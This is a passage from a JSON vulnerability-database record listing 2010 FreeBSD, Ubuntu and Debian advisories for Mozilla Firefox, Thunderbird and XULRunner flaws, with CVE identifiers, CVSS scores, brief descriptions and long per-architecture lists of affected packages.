"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:22", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-03.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-02.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-05.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-04.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-01.html"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.0.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.0.18,1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-firefox", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "seamonkey", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.5.8", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-firefox-devel", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.5.8,1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}], "description": "\nMozilla Project reports:\n\nMFSA 2010-05 XSS hazard using SVG document and binary Content-Type\nMFSA 2010-04 XSS due to window.dialogArguments being readable cross-domain\nMFSA 2010-03 Use-after-free crash in HTML parser\nMFSA 2010-02 Web Worker Array Handling Heap Corruption Vulnerability\nMFSA 2010-01 Crashes with evidence of memory corruption (rv:1.9.1.8/ 1.9.0.18)\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2010-02-17T00:00:00", "title": "mozilla -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2010-02-28T00:00:00", "id": "F82C85D8-1C6E-11DF-ABB2-000F20797EDE", "href": "https://vuxml.freebsd.org/freebsd/f82c85d8-1c6e-11df-abb2-000f20797ede.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:31", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0159", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0162", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3988", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0160", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1571"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "3.0.18+build1+nobinonly-0ubuntu0.8.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox-3.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "1.9.0.18+build1+nobinonly-0ubuntu0.8.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "3.0.18+build1+nobinonly-0ubuntu0.9.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "abrowser", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "3.0.18+build1+nobinonly-0ubuntu0.9.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox-3.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "3.0.18+build1+nobinonly-0ubuntu0.8.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "abrowser", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "1.9.0.18+build1+nobinonly-0ubuntu0.9.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1.9.0.18+build1+nobinonly-0ubuntu0.8.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "3.0.18+build1+nobinonly-0ubuntu0.8.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox-3.0", "operator": "lt"}], "description": "Several flaws were discovered in the browser engine of Firefox. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0159)\n\nOrlando Barrera II discovered a flaw in the Web Workers implementation of Firefox. If a user were tricked into posting to a malicious website, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0160)\n\nAlin Rad Pop discovered that Firefox\u2019s HTML parser would incorrectly free memory under certain circumstances. If the browser could be made to access these freed memory objects, an attacker could exploit this to execute arbitrary code with the privileges of the user invoking the program. (CVE-2009-1571)\n\nHidetake Jo discovered that the showModalDialog in Firefox did not always honor the same-origin policy. An attacker could exploit this to run untrusted JavaScript from other domains. (CVE-2009-3988)\n\nGeorgi Guninski discovered that the same-origin check in Firefox could be bypassed by utilizing a crafted SVG image. If a user were tricked into viewing a malicious website, an attacker could exploit this to read data from other domains. (CVE-2010-0162)", "edition": 3, "reporter": "Ubuntu", "published": "2010-02-17T00:00:00", "title": "Firefox 3.0 and Xulrunner 1.9 vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2010-02-17T00:00:00", "id": "USN-895-1", "href": "https://usn.ubuntu.com/895-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:03", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0159", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0162", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3988", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0160", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1571"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "1.9.1.8+build1+nobinonly-0ubuntu0.9.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "3.5.8+build1+nobinonly-0ubuntu0.9.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox-3.5", "operator": "lt"}], "description": "Several flaws were discovered in the browser engine of Firefox. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0159)\n\nOrlando Barrera II discovered a flaw in the Web Workers implementation of Firefox. If a user were tricked into posting to a malicious website, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0160)\n\nAlin Rad Pop discovered that Firefox\u2019s HTML parser would incorrectly free memory under certain circumstances. If the browser could be made to access these freed memory objects, an attacker could exploit this to execute arbitrary code with the privileges of the user invoking the program. (CVE-2009-1571)\n\nHidetake Jo discovered that the showModalDialog in Firefox did not always honor the same-origin policy. An attacker could exploit this to run untrusted JavaScript from other domains. (CVE-2009-3988)\n\nGeorgi Guninski discovered that the same-origin check in Firefox could be bypassed by utilizing a crafted SVG image. If a user were tricked into viewing a malicious website, an attacker could exploit this to read data from other domains. (CVE-2010-0162)", "edition": 3, "reporter": "Ubuntu", "published": "2010-02-17T00:00:00", "title": "Firefox 3.5 and Xulrunner 1.9.1 vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2010-02-17T00:00:00", "id": "USN-896-1", "href": "https://usn.ubuntu.com/896-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2016-09-02T18:34:07", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs-dev_1.9.0.18-1_powerpc.deb", "packageName": "libmozjs-dev", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9_1.9.0.18-1_i386.deb", "packageName": "xulrunner-1.9", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d_1.9.0.18-1_mips.deb", "packageName": "libmozjs1d", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-dbg_1.9.0.18-1_ia64.deb", "packageName": "xulrunner-1.9-dbg", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d-dbg_1.9.0.18-1_alpha.deb", "packageName": "libmozjs1d-dbg", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.18-1_hppa.deb", "packageName": "xulrunner-1.9-gnome-support", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-dev_1.9.0.18-1_s390.deb", "packageName": "xulrunner-dev", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.18-1_arm.deb", "packageName": "xulrunner-1.9-gnome-support", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-dev_1.9.0.18-1_arm.deb", "packageName": "xulrunner-dev", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs-dev_1.9.0.18-1_arm.deb", "packageName": "libmozjs-dev", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-dbg_1.9.0.18-1_arm.deb", "packageName": "xulrunner-1.9-dbg", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d-dbg_1.9.0.18-1_mipsel.deb", "packageName": "libmozjs1d-dbg", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs-dev_1.9.0.18-1_s390.deb", "packageName": "libmozjs-dev", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d_1.9.0.18-1_powerpc.deb", "packageName": "libmozjs1d", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-dbg_1.9.0.18-1_sparc.deb", "packageName": "xulrunner-1.9-dbg", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "python-xpcom_1.9.0.18-1_s390.deb", "packageName": "python-xpcom", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d_1.9.0.18-1_s390.deb", "packageName": "libmozjs1d", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-dbg_1.9.0.18-1_armel.deb", "packageName": "xulrunner-1.9-dbg", "arch": "armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "spidermonkey-bin_1.9.0.18-1_mips.deb", "packageName": "spidermonkey-bin", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9_1.9.0.18-1_sparc.deb", "packageName": "xulrunner-1.9", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-dbg_1.9.0.18-1_mips.deb", "packageName": "xulrunner-1.9-dbg", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9_1.9.0.18-1_armel.deb", "packageName": "xulrunner-1.9", "arch": "armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d-dbg_1.9.0.18-1_powerpc.deb", "packageName": "libmozjs1d-dbg", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "spidermonkey-bin_1.9.0.18-1_i386.deb", "packageName": "spidermonkey-bin", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-dev_1.9.0.18-1_mipsel.deb", "packageName": "xulrunner-dev", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.18-1_powerpc.deb", "packageName": "xulrunner-1.9-gnome-support", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "python-xpcom_1.9.0.18-1_alpha.deb", "packageName": "python-xpcom", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "python-xpcom_1.9.0.18-1_i386.deb", "packageName": "python-xpcom", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.18-1_armel.deb", "packageName": "xulrunner-1.9-gnome-support", "arch": "armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d-dbg_1.9.0.18-1_sparc.deb", "packageName": "libmozjs1d-dbg", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.18-1_mips.deb", "packageName": "xulrunner-1.9-gnome-support", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9_1.9.0.18-1_mips.deb", "packageName": "xulrunner-1.9", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-dbg_1.9.0.18-1_s390.deb", "packageName": "xulrunner-1.9-dbg", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d-dbg_1.9.0.18-1_hppa.deb", "packageName": "libmozjs1d-dbg", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs-dev_1.9.0.18-1_alpha.deb", "packageName": "libmozjs-dev", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9_1.9.0.18-1_amd64.deb", "packageName": "xulrunner-1.9", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d_1.9.0.18-1_hppa.deb", "packageName": "libmozjs1d", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "spidermonkey-bin_1.9.0.18-1_alpha.deb", "packageName": "spidermonkey-bin", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "spidermonkey-bin_1.9.0.18-1_amd64.deb", "packageName": "spidermonkey-bin", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d-dbg_1.9.0.18-1_s390.deb", "packageName": "libmozjs1d-dbg", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "python-xpcom_1.9.0.18-1_hppa.deb", "packageName": "python-xpcom", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-dbg_1.9.0.18-1_mipsel.deb", "packageName": "xulrunner-1.9-dbg", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d-dbg_1.9.0.18-1_i386.deb", "packageName": "libmozjs1d-dbg", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.18-1_alpha.deb", "packageName": "xulrunner-1.9-gnome-support", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs-dev_1.9.0.18-1_armel.deb", "packageName": "libmozjs-dev", "arch": "armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.18-1_i386.deb", "packageName": "xulrunner-1.9-gnome-support", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "python-xpcom_1.9.0.18-1_armel.deb", "packageName": "python-xpcom", "arch": "armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-dbg_1.9.0.18-1_amd64.deb", "packageName": "xulrunner-1.9-dbg", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "python-xpcom_1.9.0.18-1_mipsel.deb", "packageName": "python-xpcom", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d_1.9.0.18-1_armel.deb", "packageName": "libmozjs1d", "arch": "armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9_1.9.0.18-1_arm.deb", "packageName": "xulrunner-1.9", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-dev_1.9.0.18-1_amd64.deb", "packageName": "xulrunner-dev", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18.orig", "packageFilename": "xulrunner_1.9.0.18.orig.tar.gz", "packageName": "xulrunner", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs-dev_1.9.0.18-1_amd64.deb", "packageName": "libmozjs-dev", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9_1.9.0.18-1_s390.deb", "packageName": "xulrunner-1.9", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "spidermonkey-bin_1.9.0.18-1_powerpc.deb", "packageName": "spidermonkey-bin", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9_1.9.0.18-1_powerpc.deb", "packageName": "xulrunner-1.9", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs-dev_1.9.0.18-1_mipsel.deb", "packageName": "libmozjs-dev", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-dev_1.9.0.18-1_armel.deb", "packageName": "xulrunner-dev", "arch": "armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs-dev_1.9.0.18-1_hppa.deb", "packageName": "libmozjs-dev", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9_1.9.0.18-1_alpha.deb", "packageName": "xulrunner-1.9", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d-dbg_1.9.0.18-1_armel.deb", "packageName": "libmozjs1d-dbg", "arch": "armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.18-1_ia64.deb", "packageName": "xulrunner-1.9-gnome-support", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d-dbg_1.9.0.18-1_ia64.deb", "packageName": "libmozjs1d-dbg", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "spidermonkey-bin_1.9.0.18-1_arm.deb", "packageName": "spidermonkey-bin", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "python-xpcom_1.9.0.18-1_amd64.deb", "packageName": "python-xpcom", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.diff", "packageFilename": "xulrunner_1.9.0.18-1.diff.gz", "packageName": "xulrunner", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.18-1_amd64.deb", "packageName": "xulrunner-1.9-gnome-support", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-dev_1.9.0.18-1_hppa.deb", "packageName": "xulrunner-dev", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-dev_1.9.0.18-1_sparc.deb", "packageName": "xulrunner-dev", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "spidermonkey-bin_1.9.0.18-1_sparc.deb", "packageName": "spidermonkey-bin", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d_1.9.0.18-1_mipsel.deb", "packageName": "libmozjs1d", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "spidermonkey-bin_1.9.0.18-1_hppa.deb", "packageName": "spidermonkey-bin", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs-dev_1.9.0.18-1_sparc.deb", "packageName": "libmozjs-dev", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9_1.9.0.18-1_mipsel.deb", "packageName": "xulrunner-1.9", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "python-xpcom_1.9.0.18-1_powerpc.deb", "packageName": "python-xpcom", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9_1.9.0.18-1_hppa.deb", "packageName": "xulrunner-1.9", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "spidermonkey-bin_1.9.0.18-1_mipsel.deb", "packageName": "spidermonkey-bin", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-dev_1.9.0.18-1_alpha.deb", "packageName": "xulrunner-dev", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d_1.9.0.18-1_sparc.deb", "packageName": "libmozjs1d", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d-dbg_1.9.0.18-1_amd64.deb", "packageName": "libmozjs1d-dbg", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs-dev_1.9.0.18-1_ia64.deb", "packageName": "libmozjs-dev", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "python-xpcom_1.9.0.18-1_sparc.deb", "packageName": "python-xpcom", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d_1.9.0.18-1_alpha.deb", "packageName": "libmozjs1d", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "python-xpcom_1.9.0.18-1_mips.deb", "packageName": "python-xpcom", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-dbg_1.9.0.18-1_alpha.deb", "packageName": "xulrunner-1.9-dbg", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.18-1_mipsel.deb", "packageName": "xulrunner-1.9-gnome-support", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "spidermonkey-bin_1.9.0.18-1_armel.deb", "packageName": "spidermonkey-bin", "arch": "armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "python-xpcom_1.9.0.18-1_arm.deb", "packageName": "python-xpcom", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-dbg_1.9.0.18-1_hppa.deb", "packageName": "xulrunner-1.9-dbg", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner_1.9.0.18-1.dsc", "packageName": "xulrunner", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": 